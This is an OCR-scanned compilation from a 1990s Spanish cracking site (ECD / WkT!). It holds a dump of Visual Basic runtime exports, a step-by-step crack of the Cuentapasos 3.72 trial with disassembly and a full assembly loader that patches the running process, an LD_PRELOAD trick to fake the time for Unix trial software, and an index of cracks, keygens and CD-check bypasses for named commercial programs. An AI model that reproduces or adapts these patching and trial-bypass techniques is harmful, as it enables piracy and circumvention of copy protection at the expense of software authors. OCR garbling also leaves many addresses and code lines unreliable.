Addr:0FOD8D4B Ord: 574 (023Eh) Name: rtcOctBstrFromVar 


Addr:0FOD8E54 Ord: 575 (023Fh) Name: rtcOctV arFromVar 
Addr:0F054278 Ord: 576 (0240h) Name: rtcFileCopy 
Addr:OFOD5D5F Ord: 577 (0241h) Name: rtcFileDateTime 
Addr:0F036192 Ord: 578 (0242h) Name: rtcFileLen 
Addr:0FOD5E2D Ord: 579 (0243h) Name: rtcGetFileAttr 
Addr:0FOD5E62 Ord: 580 (0244h) Name: rtcSetFileAttr 
Addr:0FODD1FE Ord: 581 (0245h) Name: rtcR8ValFromBstr 
Addr:0F0D3CC3 Ord: 582 (0246h) Name: rtcSin 
Addr:0FOD3CEC Ord: 583 (0247h) Name: rtcCos 
Addr:0FO0D3D15 Ord: 584 (0248h) Name: rtcTan 
Addr:0F0OD3D45 Ord: 583 (0249h) Name: rtcAtn 
Addr:0F01F4E3 Ord: 586 (024Ah) Name: rtcExp 
Addr:0FO1FOFC Ord: 587 (024Bh) Name: rtcLog 
Addr:0F01F42A Ord: 588 (024Ch) Name: rtcRgb 
Addr:0FOS50A8D Ord: 589 (024Dh) Name: rtcQBColor 
Addr:0F0OD7F70 Ord: 590 (024Eh) Name: rtecMacId 
Addr:0F060COA Ord: 591 (024Fh) Name: rte TypeName 
Addr:0F05BD16 Ord: 592 (0250h) Name: rtcIsMissing 
Addr:0F004A95 Ord: 593 (0251h) Name: rteRandomNext 
Addr:0F03AE08 Ord: 594 (0252h) Name: rtcRandomize 
Addr:0FOD405A Ord: 595 (0253h) Name: rteMsgBox 
Addr:0F0D4253 Ord: 596 (0254h) Name: rtelnputBox 
Addr:0F0D3D95 Ord: 597 (0255h) Name: rtcAppActivate 
Addr:0F0261B4 Ord: 598 (0256h) Name: rtcDoEvents 
Addr:0F0475F8 Ord: 599 (0257h) Name: rteSendKeys 
Addr:0FODOA69 Ord: 600 (0258h) Name: rtcShell 
Addr:0F1099BA Ord: 601 (0259h) Name: rtcArray 
Addr:0FOD3A21 Ord: 603 (025Dh) Name: rtcGetErl 
Addr:0F04EC33 Ord: 606 (025Eh) Name: rtcStringBstr 
Addr:0F04EBF6 Ord: 607 (025Fh) Name: rtcStringVar 
Addr:0F01BD44 Ord: 608 (0260h) Name: rtc VarBstrFromAnsi 
Addr:0F0D7009 Ord: 609 (0261h) Name: rtcGetDateBstr 
Addr:0F01B62E Ord: 610 (0262h) Name: rtcGetDate Var 
Addr:0FOD70CD Ord: 611 (0263h) Name: rtcGetTimeBstr 
Addr:0FOD6FB8 Ord: 612 (0264h) Name: rtcGetTimeVar 
Addr:0F058DD8 Ord: 613 (0265h) Name: rte VarStrFromVar 
Addr:0F0D3D50 Ord: 614 (0266h) Name: rtcSqr 
Addr:0F0D4678 Ord: 615 (0267h) Name: rtcIMEStatus 
Addr:0F012378 Ord: 616 (0268h) Name: rtcLeftCharBstr 
Addr:0F00B8C4 Ord: 617 (0269h) Name: rtcLeftCharV ar 
Addr:0FODED66 Ord: 618 (026Ah) Name: rtcRightCharBstr 
Addr:0F01238B Ord: 619 (026Bh) Name: rtcRightCharVar 
Addr:0FODDOA7 Ord: 620 (026Ch) Name: rteInputCharCount 
Addr:0F0DDO76 Ord: 621 (026Dh) Name: rteInputCharCountVar 
Addr:OFOEOA2C Ord: 622 (026Eh) Name: rtcStrConvVar 


Addr:0FODO9C7 Ord: 624 (0270h) Name: rteGetHostLCID 
Addr:0F0O3AB67 Ord: 625 (0271h) Name: rtcCreateObject 
Addr:0F0D2A4B Ord: 626 (0272h) Name: rteGetObject 
Addr:0FOESE4E Ord: 627 (0273h) Name: rtcAppleScript 
Addr:OFOOBCES Ord: 628 (0274h) Name: rtecMidBstr 
Addr:0FODED79 Ord: 629 (0275h) Name: rteMidVar 
Addr:0FODEEBS Ord: 630 (0276h) Name: rtcInStr 
Addr:OFOOBCBO Ord: 631 (0277h) Name: rtecMidCharBstr 
Addr:0F04306E Ord: 632 (0278h) Name: rteMidCharVar 
Addr:0FODEE39 Ord: 633 (0279h) Name: rtcInStrChar 
Addr:0F0D8592 Ord: 634 (027Ah) Name: rtBstrFromErrVar 
Addr:OFODSABF Ord: 635 (027Bh) Name: rtBoolFromErrVar 
Addr:0FOD83AA Ord: 636 (027Ch) Name: rtCyFromErrVar 
Addr:0FOD816C Ord: 637 (027Dh) Name: rtl2FromErrVar 
Addr:0F0OD81F3 Ord: 638 (027Eh) Name: rtl4FromErrVar 
Addr:0FOD826F Ord: 639 (027Fh) Name: rtR4FromErrVar 
Addr:0FOD82FE5 Ord: 640 (0280h) Name: rtR8FromErrVar 
Addr:0F0D8A73 Ord: 641 (0281h) Name: rtcDateFromVar 
Addr:0FOD86E2 Ord: 642 (0282h) Name: rtcVarFromVar 
Addr:0F0D8722 Ord: 643 (0283h) Name: rte CVErrFromVar 
Addr:0FOD4AC3 Ord: 644 (0284h) Name: VarPtr 
Addr:0F040CDA Ord: 645 (0285h) Name: rtcDir 
Addr:OFOD5ADS8 Ord: 646 (0286h) Name: rtcCurrentDirBstr 
Addr:0FOD5A29 Ord: 647 (0287h) Name: rtcCurrentDir 
Addr:0F00369C Ord: 648 (0288h) Name: rtcFreeFile 
Addr:O0FODESAS Ord: 649 (0289h) Name: rtcCompareBstr 
Addr:0F019070 Ord: 650 (028Ah) Name: rtcBstrFromFormatV ar 
Addr:0F0497D53 Ord: 651 (028Bh) Name: rtcBstrFromError 
Addr:0F0497A7 Ord: 652 (028Ch) Name: rtc VarFromError 
Addr:0FODEDO2 Ord: 653 (028Dh) Name: rtcLenCharVar 
Addr:0FODED2B Ord: 654 (028Eh) Name: rtcLenVar 
Addr:0F0D8766 Ord: 655 (028Fh) Name: rtcFixVar 
Addr:0F0D87CD Ord: 656 (0290h) Name: rtcAbsVar 
Addr:0F0D8834 Ord: 657 (0291h) Name: rtcIntVar 
Addr:0F0D889B Ord: 658 (0292h) Name: rtecSgnVar 
Addr:0F0DCO025 Ord: 660 (0294h) Name: rtc VarFromFormatV ar 
Addr:0F0OD72CB Ord: 661 (0295h) Name: rtcDateAdd 
Addr:0FOD75AD Ord: 662 (0296h) Name: rtcDateDiff 
Addr:0FOD78EA Ord: 663 (0297h) Name: rtcDatePart 
Addr:0F0D4693 Ord: 664 (0298h) Name: rtcPartition 
Addr:0F0D4991 Ord: 6653 (0299h) Name: rtcChoose 
Addr:0F04285D Ord: 666 (029Ah) Name: rtcEnvironVar 
Addr:0F04288B Ord: 667 (029Bh) Name: rtcEnvironBstr 
Addr:0FOD4A4C Ord: 668 (029Ch) Name: rtcSwitch 
Addr:0F012135 Ord: 669 (029Dh) Name: rte CommandBstr 


Addr:0F01218E Ord: 670 (029Eh) Name: rte CommandVar 
Addr:0FOE8E55 Ord: 671 (029Fh) Name: rteSLN 
Addr:OFOESE7A Ord: 672 (02A0h) Name: rteS YD 
Addr:0FOE8ECB Ord: 673 (02A 1h) Name: rteDDB 
Addr:0FOE901B Ord: 674 (02A2h) Name: rtcIPMT 
Addr:0F0E9107 Ord: 675 (02A3h) Name: rtePPMT 
Addr:0FOE91A5 Ord: 676 (02A4h) Name: rtecPMT 
Addr:0F0E9275 Ord: 677 (02A5h) Name: rtcPV 
Addr:0F0E9325 Ord: 678 (02A6h) Name: rtcFV 
Addr:0F0E93DC Ord: 679 (02A7h) Name: rtcNPer 
Addr:0F0E9514 Ord: 680 (02A8h) Name: rtcRate 
Addr:0F01B43E Ord: 681 (02A9h) Name: rtcImmediatelf 
Addr:0F0E9732 Ord: 682 (02AAh) Name: rtcIRR 
Addr:O0FOE9A66 Ord: 683 (02ABh) Name: rte MIRR 
Addr:OFOE9BEE Ord: 684 (02ACh) Name: rteNPV 
Addr:0F00D607 Ord: 685 (02ADh) Name: rtcErrObj 
Addr:0F0D8B28 Ord: 686 (02AEHh) Name: rtUll FromErrVar 
Addr:0FOD8SA7F Ord: 687 (02AFh) Name: rte VarDateFromVar 
Addr:0FOE9DFEB Ord: 689 (02B 1h) Name: rtcGetSetting 
Addr:0FOE9FCS Ord: 690 (02B2h) Name: rtcSaveSetting 
Addr:OFOEAOB6 Ord: 691 (02B3h) Name: rtcDeleteSetting 
Addr:0FOEA4A7 Ord: 692 (02B4h) Name: rteGetAllSettings 
Addr:OFODEDFS Ord: 693 (02B5h) Name: rtcByteValueBstr 
Addr:0FOD8BAD Ord: 694 (02B6h) Name: rtcBstrFromByte 
Addr:0FOD8BCE Ord: 695 (02B7h) Name: rtcVarBstrFromByte 
Addr:0FODEE14 Ord: 696 (02B8h) Name: rtcCharValueBstr 
Addr:0FOD8BFC Ord: 697 (02B9h) Name: rtcBstrFromChar 
Addr:0F0D8C43 Ord: 698 (02B Ah) Name: rte VarBstrFromChar 
Addr:0FOD7CF9 Ord: 699 (02BBh) Name: rtcSetCurrentCalendar 
Addr:0F01B38D Ord: 700 (02BCh) Name: rtcGetCurrentCalendar 
Addr:0F0D25C9 Ord: 999 (03E7h) Name: TipInvokeMethod2 
Addr:0FOD26F0 Ord:1016 (03F8h) Name: TipInvokeMethod 
Addr:0FOECSAO Ord: 1024 (0400h) Name: ¡ID_IVbaHost 
Addr:0F0170E9 Ord:1025 (0401h) Name: EbGetObjConnectionCounts 
Addr:0FOS5A1D9 Ord:2000 (07D0h) Name: CreatelExprSrvObj 
Addr:0F0D1387 Ord:2010 (07DAh) Name: EbGetVBAObject 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


progrAmA Cuentapasos 3.72 W95 


El programa cuentapasos es una utilidad para controlar 
DEsCripCión el gasto telefonico, con los ultimos planes (los bononets) 
que telefonica a puesto. 


Como comentario, no voy a hacerlo estilo Carrascal, sino decir 
que este crack funciona para el cuentapasos 3.72 con las siguientes 
caracteristicas: 


Fichero: cpasos32.exe 
Tamaño: 531.611 bytes 


ComEntArio Fecha: 30/3/99 


Digo esto, porque me han informado que el autor ha modificado 
el ejecutable haciendolo mas pequeño, pero todavia no me lo he 
bajado para comprobarlo. ;) 


Introducción 


Lo primero de todo, mandar unos saludetes a todOs los colegas de la scene 
del 
cracking hispano, ya que segun veo parece que estamos remontando el vuelo, a ver 
si algun dia llegamos a hacer una pagina semejante a la de +fravia. 


Bueno, he escogido este programa porque es bastante popular al menos que yo 
sepa en españa, y al parecer no habia un crack para el y decidi intentar remediarlo. 


> 
Vi 


Al Atake 


Veamos, despues de instalar el programa, al ejecutarlo vemos que nos sale una 
nagscreen avisandonos que no estamos registrados y que tenemos un periodo tipico 
de prueba de 30 dias. 


Al ser un programa hecho en Visual Basic, nos aseguramos que en el fichero 
winice.dat del softice este la linea: 


EXP=CXAWINDOWSIS YSTEMIMSVBVM50.DLL 


Hechas ya las presentaciones, vamos a intentar abordarlo con los siguientes 
breakpoints que a mi entender son bastantes utiles a la hora de crackear programas 
hechos en Visual Basic, que son lo siguientes: 


rícDoEvents 
rtcMsgBox 

_ vbaNew 

_ vbaNew2 
rtcInputBox 
rtcGetTimer 
rtcUpperCaseVar 
rtcUpperCaseBstr 


Pues bien, el primer paso que tenemos que dar es buscar donde el programa 
toma la eleccion de seguir cuando nosotros pulsamos aceptar o salir cuando 
pulsamos el boton correspondiente; de esta lista probamos en esta ocasion con 
rtcDoEvents, asi que nos vamos 
al softice ponemos bpx rtcdoevents, y pulsamos Ctrl-D con lo que volvemos a la 
nagscreen y pulsamos aceptar; inmediatamente despues volvemos al softice y 
pulsamos una vez F12 con lo que nos situamos en las siguientes lineas: 


Pulsamos F10 


0137:00474963 call [MSVBVMS5O0O!rtcDoEvents] 
0137:00474969 mov dword ptr [ebp-04],00000051 
0137:00474970 lea ecx,[ebp-64] 


0137:00474973 push ecx 
0137:00474974 call [MSVBVMS50!rtcGetPresentDate] 
0137:0047497A lea edx,[ebp-64] 


Vamos pulsando F10 


0137:004749B2 push edx 

0137:004749B3 push 02 

0137:004749B5 call [MSVBVM50!rtc__vbaFreeVarList] 
0137:004749BB add esp,0C 

0137:004749BE movsx eax, word ptr [ebp-00D4] 


0137:004749C5 test eax,eax ---> si eax=0 sale, no sigue y termina el 
programa. 
0137:004749C7 jz004761B3  ---> sieax=-1 entonces sigue 


0137:004749CD mov dword ptr [ebp-04],00000052 

0137:004749D4 cmp dword ptr [0054F200],00 

0137:004749DB ¿nz 4749F9 ---> Si eres un chico bueno sigue para adelante 
en caso contrario si eres un chico malo 
se acabo tu andadura. 


Bueno, bueno, bueno, segun parece hemos encontrado el lugar donde despues 
de pulsar sobre uno de los dos botones de la nagscreen el programa hace una cosa u 
otra dependiendo de si aceptas o deseas salir. Luego ya tenemos la direccion donde 
despues de multiples calculos de conversiones de tipos de datos tipicos del Visual 
Basic, esquema de proteccion del autor (de la cual se podria hablar en otro tutorial), 
etc, etc, etc, se dirige el programa. Luego recapitulemos, ya sabemos donde tiene 
que saltar para proseguir el programa, ahora nos hace falta saber desde donde lo 
podemos llamar. ¿Que se os ocurre? 
a mi personalmente despues de ver lo bien que ha funcionado el breakpoint del 
rtcDoEvents, 
voto por volverlo a usar pero ahora antes de que salga la nagscreen. 


Empezamos otra vez, ponemos el breakpoint del rtcDoEvents, y vamos 
pulsando Ctrl-D hasta uno antes de que salga la famosa nagsreen (tenemos que 
pulsar 4 veces Ctrl-D) 
con lo que nos encontramos con lo siguiente: 


* Vamos pulsando Fl0 * 


0137:00477D06 call [MSVBVM50!rtcDoEvents] 
0137:00477D0C wait 

0137:00477DO0D push 00477D66 
0137:00477D12 ¡mp 00477D5C 


0137:00477D5C lea ecx,[ebp-24] 
0137:00477D5F call [MSVBVMS50!__ vbaFreeStr] 


0137:00477D65 
0137:00477D66 
0137:00477D69 
0137:00477D70 
0137:00477D71 
0137:00477D72 
0137:00477D73 
0137:00477D75 
0137:00477D76 


0137:004741D6 
0137:004741 


0137:004741E2 
0137:004741E9 


ret 

mov ecx,[ebp-20] 

mov fs:[00000000],ecx 
pop edi 

pop esi 

pop ebx 

mov esp,ebp 

pop ebp 

ret 0004 


call 00476F50  ---> Todo el meollo de la proteccion 

mov dword ptr [ebp-04],0000003F ---> regresa aqui despues 
del anterior ret 0004 

cmp dword ptr [0054B7AC],00 

jnz 00474207 


Pues bien, a partir del JNZ 00474207 empieza a decir que no estamos 
registrados, que si es un version de evaluacion, .... Luego si en vez de que ese CALL 
00476E50 llame todas las comprobraciones que lleva a cabo ponemos la direccion 
que obtuvimos antes donde proseguia el programa, VOILA ;). 


Cambiamos el call 00476F50 por call 004749F9. Pero Houston, Houston, 
tenemos un problema, el parche no podemos aplicarlo con un editor hexadecimal 
(bendito Visual Basic), pues bien aqui tenemos dos opciones: 


- Usar el Proccess Patcher v2.4 de thewd 
- Usar el Tasm 5.0 


Si usas el Tasm 5.0: 


; Basado en el loader.exe original de Hayras [tNO '98] 


; Tienes que usar Tasm 5.0 8 import32.lib para compilarlo 


; tasm32 /ml crack.asm 
; tlink32 /Tpe /aa /ccrack,, <path to> import32.lib 
; reemplaza <path to> donde este la libreria import32.lib 


.386P 
Locals 
jumps 


.Model Flat ,StdCall 


¡Definimos las funciones externas y constantes que necesitamos. 


Extrn  MessageBoxA:PROC 
Extrn  WaitForInputldle:PROC 


Extrn  WriteProcessMemory:PROC 
Extrn  ReadProcessMemory:PROC 
Extrn CreateProcessA:PROC 
Extrn CloseHandle:PROC 

Extrn ExitProcess:PROC 


.Data 

CSiR_Tag db 'Lector PE £ CRACKER Por esiel2 -1999-'0 
CSiR_Error db 'Error!!!',0 

CSiR_Errorl db 'Algo se jodio...',0 

OpenERR_txt db 'Error con el CreateProcess :(',0 
ReadERR_txt db 'Error con el ReadProcessMemory :(,0 
WriteERR_txt db 'Error con el WriteProcessMemortry :P",0 
VersionERR_txt db 'No es la version 3.72 del cuentapasos :(*,0 
CSiR_ProcessInfo dd 4 dup (0) 

CSiR_StartupInfo db 48h dup (0) 

CSiR_RPBuffer db 10h dup (0) 


CSiR_AppName db 'cpasos32.EXE',0 
fuck dd 004741d6h 
sizeof dd 5 


checkbytes db 0e8h,075h,02dh,0,0 


patch_data_1 db Oe8h,01eh,08h,0,0 
patch_size_1 dd 5 
patch_addr_1 dd 004741d6h 


.Code 

Main: 
push offset CSIR_Tag 
mov  dword ptr [CSiR_StartupInfo],44h 
push offset CSiR_ProcessInfo 
push offset CSiR_StartupInfo 
push 0 
push 0 
push 20h 
push 0 
push 0 
push 0 
push 0 
push offset CSIR_AppName 
call CreateProcessA 


test  eax,eax 
jz  OpenERR 


Wait4Depack: 
push LARGE-1 
push  dword ptr [CSiR_ProcessInfo] 
call WaitForInputldle 


Check_Data: 


push 0 

push  dword ptr [sizeof] 

push offset CSiIR_RPBuffer 

push  dword ptr [fuck] 

push  dword ptr [CSiR_ProcessInfo] 
call ReadProcessMemory 

test  eax,eax 


jz  ReadERR 
¡int 03 ;-) 
cld 


lea  esi, CSiIR_RPBuffer 
lea edi, checkbytes 
mov  ecx,5 

rep cmpsb 

jnz VersionERR 


Patch_the_mother: 
push 0 
push  dword ptr [patch_size_1] 
push offset patch_data_1 
push  dword ptr [patch_addr_1] 
push  dword ptr [CSiR_ProcessInfo] 
call WriteProcessMemory 
test  eax,eax 
jz WriteERR 


Close_This_app: 
push  dword ptr [CSiR_ProcessInfo] 
call CloseHandle 
push  dword ptr [CSiR_ProcessInfo+4] 
call CloseHandle 


Exit_Proc: 
Push LARGE-1 
Call ExitProcess 


VersionERR: 
lea  eax, VersionERR_txt 
jmp  abort 

ReadERR: 
lea  eax, ReadERR_txt 


jmp  abort 
OpenERR: 
lea  eax, OpenERR_txt 
jmp  abort 
WriteERR: 
lea  eax, WriteERR_txt 
abort: 
push 0 
push offset CSIR_Error 
push eax 
push 0 
call MessageBoxA 


jmp Close_This_app 


End Main 


Se acabo por esta vez, espero que me haya explicado bien, hasta otra.... 


wen 
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Whiskey Kon Tekila 


progrAmA Programas de evaluación en UNIX UNIX 


po Sharewares, Demos 

| protECCión Limitaciones en el tiempo de uso. 

[— DiFICUltAD 1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
hErrAmiEntAs Una Librería dinámica propia : Mi_Time 

| CrACkEr [Bart 

[FECHA |24de Octubre de 1998 


Introducción 


La verdad es que no trabajo en Windows mucho, mi campo en mas bien el Linux, 
en este caso tengo un truquillo que puede serviros, para saltarse la proteccion de la 
copias de programas de evaluacion. 


Consiste en hacer creer al programa que esta viviendo en un tiempo distinto, 
gracias a las librerias dinamicas y a la variable de entorno LD_PRELOAD 
No se si esto es extensible de algun modo a las DLL de Windoze. 


CREO QUE ES VALIDO PARA TODO SISTEMA UNIX, NO FUNCIONA CON 
PROGRAMAS CON EL BIT DE SUID ACTIVADO, PUES ELLOS NO 
ACCEPTAN EL LD_PRELOAD. 


Al Atake 


MODO DE EMPLEO: 


Quitar la proteccion al programa "EXE" que tien 


evaluacion 


1) creo funciones de tiempo 


en un momento en el qu 
licencia de 30 dias o lo 


cuenta d 


en una libreria y que tiene tiempo fijado 
1] programa de evalucion funciona con 
que sea. 


2) uso el programa "strace" y "grep" 
Sstrace EXE 2> zz; grep "time(NULL)" zz;¿rm zz 
time (NULL) = 908959851 
3) aparece un numero: N_time crack = 908959851 
time returns the time since the Epoch (00:00:00 UTC, Jan- 
uary 1, 1970), measured in seconds. 
4) Mi libreria dinamica: 
mi_time.so.1.0 
Se carga antes que la del sistema: 


S$mv EXE EXE.orig 


asi el fichero EXE es un script ahora 


(parecido a un .bat del MSDOS) 


export LD_PRELOAD=/1ib/libmi_time.so.1.0 


EXE.orig 

5) Incluyo todo en un atachment (_Mi Time ) 

Un saludo a todos los ECD-mailers. 
| ESVAVAVAVAVA | 
| | | N | 
| | | [Elvis ds |] 
| Lo o_—_ | |. dead! |] 
| O | 
| ex iló!] Tal Zo] bart. | | 
| | mn. ou | AN y | 
| | | 1/ | 
| NU 1/ 1 | 
| IZA | 
| 7] PAN | 
| | 
Linux: The choice of a GNU generation 


"My opinions are my own, 


and I've get *lots* of them!" 


KAKXKKXKKKKKKKKK KK KK KKKKKKKKKKKK KK KK KK KK KK KKKKKKAK 


W98 supports real multitasking - it can boot and crash simultaneously 


KAKKKXKKKXKKKKKKKKXKX XK KKKXKKKXKKKKKKKKX KK KK KKKKKKKKKKKXKAk 
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ESTUDIO COLECTIVO DE DESPROTECCIONES 


Whiskey Kon Tekila 


Programa Programa Xxx | W95 / W98 / NT 
A AA 
MA a e ias 

Url http://www 
[Protección  |NagSereen. Time Limit 30 Dias 
[Dificultad [1) Principiante, 2) Amateur, 3) Aficionado, 4) Profesional, 5) Especialista 
| Herramientas  [Softlce v3.25, W32dasm v8.9, UltraEdit v6.10a 
Objetivo [Simular estar registrados. 
O 


Lu 
Introducción 

wr 
Al Atake 
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Última Actualizacion: 01/11/99 


ECD MIRRORS: 


Esta es la lista de páginas oficiales para consultar el ECD: 


m Crackz Web Site 


= http://ecd.tsx.org 
= http://w56.org/ecd 


Esta última url http://w56.org/ecd es un desvio aleatorio a cualquiera 


de los mirrors. 
Por lo que os recomendamos que lo utiliceis si quereis ponernos un 


link en vuestra web. 


ULTIMAS NOVEDADES: 


Saludos a todos! Parece que por fin la Cracking-Scene-Hispana 
comienza a dar muestras de una gran actividad. Son muchos y muy 
buenos los artículos que he recibido en estas dos últimas semanas : 


. Cuentapasos v3.75 

. Registry Studio V1.01 
Code Snippet Creator v1.05: Archivos PE 
La Memoria en W32: Intro 
. Reversing with ToPo v1.0 

. Lake Clear Animato v1.0c 

. Productos RKS Software 

. Winboost 2000 v1.0.0.1999 
. Kyodai v10.21 

. Quick Heal v5.20 

. Ultraedit v6.20b 

. WinGest v3.5 

. Toggle Mouse v3.4.3 

. WkT! Faq Oficial página 1 
. WkT! Faq Oficial página 2 
. WkT! Faq Oficial página 3 


Roa a a a pa pa 


Una visita obligada es la sección de Documentos Genéricos donde 


encontrarás la última revisión de la WkT! Faq Oficial, un artículo muy 
completo sobre el formato de los archivos PE, un artículo sobre la 
Memoria en W32 y un tutorial sobre cómo utilizar Topo v1.0, además 
de otros documentos igualmente interesantes. 


AGRADECIMIENTOS: 


WKkT! agradece a todos sus colaboradores su ayuda con el proyecto 
ECD, y su inestimable apoyo moral. Muchas gracias a todos los que 
visitals nuestros forums sobre Ingenieria Inversa y nos abrasais a 
preguntas. 

Gracias a TNT! y KuT! por sumarse al proyecto ECD con sus ensayos 
de Ingenieria Inversa. Thanks to Crackz for his mirror. 


COLABORA CON EL PROYECTO ECD: 


La versión Inglesa del ECD se encuentra en fase de preparación. 
NECESITAMOS TRADUCCIONES !! 

Si se te da bien el Ingles y te gustaria colaborar en el proyecto ECD, 
por favor, traduce alguno de estos tutoriales al Ingles y envia la 
traducción a wktObigfoot.com 


(conserva el formato original, gracias) 


¡OJO : Cuestiones legales a tener en cuenta. | 


ESTUDIO COLECTIVO DE DESPROTECCIONES: 


Este site nace con el objetivo de recopilar tutoriales en castellano sobre 
el noble arte del cracking, para de esta manera favorecer el aprendizaje 
de las técnicas de debugging, imprescindibles para defendernos de los 
bugs (mayormente intencionados, o sea protecciones) que los 
fabricantes de software introducen en sus programas, que no lo 
olvidemos, residen en nuestro disco duro, por lo cual deberíamos ser 
libres de poderlos modificar a nuestro antojo. 

(Uf, vaya frase...;-) 


NOTA PARA EL PROGRAMADOR INDIGNADO QUE ESTA LEYENDO 
ESTAS PAGINAS 


Si eres de los que piensan que los crackers estamos de mas, que lo 
unico que hacemos es perjudicar a las casas de soft, que te estamos 
robando dinero......... bien, quiza lo verias todo de manera distinta desde 
"el otro lado". Si, has leido bien, te estamos invitando a que te 
introduzcas en el mundo de la Ingenieria Inversa. Te invitamos a leer 
tutoriales, a crackear tus propios programas y aprender como 
PROTEGERLOS MEJOR. 

¿Perplejo? pues no deberias estarlo, en lugar de quejarte de nuestro 
comportamiento y abrir la veda de la "caza al cracker", lo mejor que 
puedes hacer es aprender de tus errores y de los demás. Despues de 
todo, el "trabajo sucio” lo hemos hecho por ti. ;0) 

Aunque parezca extraño, WkT! está dedicado a formar a los 
programadores , mostrándoles sus defectos y el camino para producir 
software de calidad. 


Crackea Jacta Est 


Entendemos por tutoriales, la explicación de cómo se desprotege un 
determinado programa. 

Se puede acceder a todos ellos a través de las 3 páginas de índices, 
cada una de las cuales está ordenada de diferente manera : 


e Por Tipo de Protección : Cd-Checks, Mochilas, Limitaciones 
de tiempo, .... ) 

e Por Fecha de Publicación : Util para ir siguiendo las 
novedades publicadas. ) 

e Por Orden Alfabético : Util para buscar un programa en 
concreto. 


Pero aún hay más, y son los documentos genéricos, que explican algun 
tema concreto. 

Por ejemplo, la FAQ de Cracking, Cómo Crackear, Introducción al 
Softlce, VBS, .... 

De momento están agrupados en Documentos Genéricos , y si más 
adelante hace falta, ya se dividirán en subgrupos. 


ECD idea original de Mr.Brown. 

Primeras páginas creadas por Mr.Brown, retocadas, mantenidas y 
optimizadas a 800x600 para Netscape y Opera por Mr.WhiTe. 
Cualquier colaboración será bien recibida, así que anímate: 
Haznos llegar tus documentos con este formato 
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| Indice por Tipo de Protección 


Mochilas, Dongles, Hardware Key, .... 


[MatLab 5 (W95) 
¡Estudio y desprotección de la mochila. 
[Enero 98 |+Aitor ISoftlce 3.2, Wdasm 8.X, Editor Hexadecimal 


¡Cd-Checks, 20d 


[Commandos Behind the Enemy Lines (W95) 
[Evitar el Cd-Check. 


15/90/98  [Mr.Brown [SoftIce 3.22, IDA Pro 3.75, Editor 
Hexadecimal 


[NEED FOR SPEED 3 (W95) 
[Evitar el Cd-Check. 
107/06/99 [Mr.WhiTe ¡W32Dasm v8.9, Editor Hexadecimal 


>» 
we 


¡Generadores de Llaves, KeyMakers, .... 


[Lake Clear Animato v1.0c (W95/W98/NT) 
¡Obtención de un número de Serie Válido y creación de KeyMaker 
[21/ 10/99 [Mr.Green ¡Softlce v3.24 


[Productos RKS Software (W95) 
¡Obtención de un número de Serie Válido y creación de KeyMaker 
118/ 10/99 [Mr.Green ¡Softlce v3.24 


[File Compare Utility 3.0.002 (W95) 
[Hacer un Generador de claves (KeyGen). 
101/03/99 ¡Mr.Brown ¡Softlce 3.22, JavaScript 


[Revival 2.1 (W95) 
[Explicación para hacer un Generador de Llaves. 
¡Octubre 98 [Mr Pink ¡Softlce, IDA Pro 3.75, Compilador de C 


Win 


Shareware: Pantallas molestas (Nag Screens), .... 


[Ulead PhotolImpact v4.2 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 


so 107/99 Mew EA v3.25, W32dasm v8.9, UltraEdit 


[Lotus SmartSuite Millenium Edition (W95) 
Conseguir que no caduque el programa y NagScreen. 


1 3/07/99 MrwaTe E v3.25, W32dasm v8.9, UltraEdit 


[CuentaPasos v3.72 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 


02/05/99 [Esiel2 Softlce 3.22, Tasm 5.0, Process Patcher v 2.4 
(opcional). 


[PhotoLine 4.53 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 
(20/ 11/98 [Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


[TextPad 3.2.4 (W95) 
¡Saltarse el aviso inicial de shareware 
Julio 98 ¡Mr.Brown ¡Wdasm 8.9, Editor Hexadecimal 


[Logical (DOS) 
[Evitar la pantalla inicial de introducción de password. 
Julio 98 [Mr.Brown ¡SoftIce 3.22, Editor Hexadecimal 


Shareware: Limitaciones de Funciones, .... 


[Ulead Video Studio v3.0 (W95) 

Conseguir que no caduque el programa, NagScreen y otras 
limitaciones 

14/09/99 [Mr.Orange [WkT!] ¡Softlce v3.25 


[English-Spanish Interpreter 2000 (W95) 
¡Conseguir que no caduque el programa y NagScreen. 
(25/08/99 [Mr.Crimson ¡Softlce v3.25, TechFacts 95 


¡Slim Show 3.1 (W95) 


'Q uitar las limitaciones de la versión Shareware. 


29/9/98 [Mr Pink Softlce 3.22, IDA Pro 3.75, Editor 
Hexadecimal 


[Backgammon Pro (W95) 
¡Quitar límite de partidas para la versión shareware 
J ulio 98 [Mr.Brown ¡Softlce 3.22, Editor Hexadecimal 


Shareware: Buscar Números de Registro, Serials, .... 


Winboost 2000 v1.0.0.1999 (W95/W98/NT) 


Obtener un número de Serie Válido 


: ProcDump v1.5, Gettyp v2.38, W32dasm 
Ú id MrwaiTe e UltraEdit v6.10a 


Kyodai v10.21 (W95/W98/NT) 


Obtener un número de Serie Válido 


17/10/99 mo 


WinGest v3.5 (W95/W98/NT) 


ProcDump v1.50, Gettyp for Dos v2.35, 
Softlce v3.24, W32dasm v8.93, UltraEdit 
v6.10a 


Obtención de un número de Serie Válido 


107/07/99 [XASX ¡Softlce 939.23 


Advanced Video Poker v1.1 (W95) 


Buscar el número de serie y crear su Key-Generator 


14/08/99 [Mr.GReeN ¡Smartcheck v6.01 (Build 952) 


Exploit Submission Wizard 5 (W95) 


Conseguir la clave para registrarse. 


101/06/99 [Esiel2 ¡Softlce v3.24 


[Talisman 1.1 (W95) 
¡Conseguir la clave para registrarse. 
[11/5/99 ¡Mr.WhiTe ¡SoftIce 3.24 


[Picture Explorer 1.21 (W95) 
¡Conseguir la clave para registrarse. 
109/01/99 [Mr.Grey ¡Wdasm 


[KAWA 3.13 (W95) 
¡Conseguir la clave para registrarse. 
109/01/99 [Mr.Grey ¡Softlce 3.24 


Java Script It ! v1.3 (W95) 


[Conseguir la clave para registrarse. 
107/01/99 [Esiel2 ¡SoftIce v3.24 


[Cover Your Tracks 3.1 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 12/98 [Mr.Grey ¡Softlce 3.24 


[AddSoft 2.26 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 12/98 [Mr.Grey ¡Softlce 3.24, Hex Workshop 2.54 


Uninstall Manager 2.60 (W95) 
¡Conseguir la clave para registrarse. 
(20/ 11/98 [Mr.Grey ¡SoftIce 3.24 


